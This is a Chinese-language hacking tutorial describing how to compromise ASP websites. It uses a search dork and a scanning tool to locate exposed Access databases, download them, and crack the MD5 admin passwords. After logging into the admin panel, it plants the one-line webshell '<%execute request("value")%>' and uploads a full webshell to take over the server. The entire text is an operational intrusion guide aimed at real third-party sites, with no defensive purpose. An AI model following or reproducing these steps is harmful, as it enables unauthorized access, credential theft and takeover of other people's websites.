挖掘机 v1.1
辅臣数据游览器
一名话
木马
ASP马
首先打开挖掘机 v1.1,
选择“添加后缀”加入一个新的后缀“/database/userdata.mdb”并勾选,其他后缀全都不要勾
关键词填“inurl:xxlr1.asp?ID=”
开始
看下方的检测结果里一会就会出了很多
数据库地址
随便选取一个数据库地址,双击就会自动
下载,我们保存到桌面,用辅臣打开他
找到表名“user1”双击打开
“user”为用户名 “pas”为
密码
我们可以看到密码是用MD5加密过的,可以到
http://www.cmd5.com解密(如果查询结果为“NotFound”说明没有记录,需要换一个用户)
获得密码之后就可以去网站登陆了
登陆之后选择“管理网站”,进入
后台
如果前台没有的话就用明小子或是啊D扫一下后台地址
后台拿到了,接下来就是拿shell了
随便选取一个项目,选择“修改”,把原内容清掉,插入一句话木马“<%execute request("value")%>”(如果没有项目的话直接填在下方的
“增加项目”然后添加调查)
调查的数据库路径是“dc/webdc.asp”把这个加入到网站主页的路径后就是完整的路径,打开采飞扬 - 网站小助手,把完整的路径
输入,然后
按“go...”就能使用一句话木马了,观察给出的
程序路径,应该是***\dc\help.asp(***为前面的路径,因为每个站不一样我就不举例,省得
误会)
让你“输入保存的路径”,你就填***\a.asp(这里的***就是上面的***)
接着找到火狐NEW WEBSHELL 8.0,右键它,选择“用记事本打开”,选取全部内容,复制,并粘贴到刚才让你“输入
文件的内容”后面的框中
,然后按“保存”就ok了
在浏览器中打开http://(这个站的地址)/a.asp,输入密码“admin”(火狐NEW WEBSHELL 8.0的密码,用其他webshell的请根据实际填相应
的密码)
这样我们就拿下了一个WEBSHELL
是很容易的,工具网上好多的,自己找下,不明白问我或是找相应
教程
